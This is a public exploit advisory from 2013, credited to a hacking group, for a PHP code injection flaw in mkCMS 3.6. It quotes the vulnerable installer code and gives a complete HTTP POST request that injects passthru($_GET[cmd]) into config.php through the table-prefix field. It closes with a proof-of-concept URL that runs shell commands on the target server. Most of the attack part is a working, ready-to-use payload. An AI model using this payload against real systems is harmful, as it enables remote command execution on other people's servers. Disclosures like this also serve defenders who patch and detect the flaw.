# Exploit Title : mkCMS PHP Code Injection # Date : 11 June 2013 # Exploit Author : CWH Underground # Site : www.2600.in.th # Vendor Homepage : http://mkcms.milankragujevic.com/ # Software Link : http://jaist.dl.sourceforge.net/project/milan-cms/Releases/mkCMS-v3.6.zip # Version : 3.6 # Tested on : Window and Linux ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################################### VULNERABILITY: PHP CODE INJECTION #################################### /admin/install/verify_3.php (LINE: 5-81) ----------------------------------------------------------------------------- LINE 5-9: $db_name = @$_SESSION['db_name']; $db_user = @$_SESSION['db_user']; $db_pass = @$_SESSION['db_pass']; $db_host = @$_SESSION['db_host']; $tbl_prefix = @$_SESSION['tbl_prefix']; ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- LINE 34-63: $config = "passthru($_GET[cmd]),// /config.php ----------------------------------------------------------------------------- 'root', 'pass' => 'usbw', 'db' => 'mkcms', 'host' => 'localhost', 'prefix' => '' , "c" =>passthru($_GET[cmd]),//' ); $root = '/mkCMS/'; $path = 'http://localhost/mkCMS/'; $sitename = get_set('sitename'); $sitedesc = get_set('sitedesc'); $language = get_set('lang'); $theme = get_set('theme'); $THEME_DIR = THEMES_DIR . $theme . '/'; $theme_path = $path . 'themes/'.$theme.'/'; ?> ----------------------------------------------------------------------------- ##################################################### EXPLOIT ##################################################### POST /mkCMS/admin/install/verify_2.php HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/mkCMS/admin/install/step2.php Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=on; has_js=1; SESS3e2018b2c38b123a9f41b7251051544c=8RPdDYThmQJ1_psqG3gxv7o2ExJKKJVpS59B0vN2klg Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 145 db_name=mkcms&db_user=root&db_pass=toor&db_host=localhost&tbl_prefix=%27+%2C+%22c%22+%3D%3Epassthru%28%24_GET%5Bcmd%5D%29%2C%2F%2F&submit=Proceed POC: http://target/mkCMS/index.php?cmd=dir ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################